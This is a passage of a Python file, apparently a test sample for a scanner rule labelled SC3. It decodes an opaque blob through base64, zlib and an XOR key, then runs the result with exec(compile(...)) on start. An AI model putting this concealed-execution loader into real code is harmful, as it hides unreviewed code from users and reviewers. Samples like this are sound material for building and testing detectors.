aLjC+qXb6tbv6kIXkot6e/8o3DPsWiAZu6r/gwIhKVW683ImnO9whHi9j6Ne9/9gMXyCTiPS6KvffZ7amYhLz8owc6dzEazn+EPGB8"
_K = bytes.fromhex("d45c06ddcc74ddc61da7f37d")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
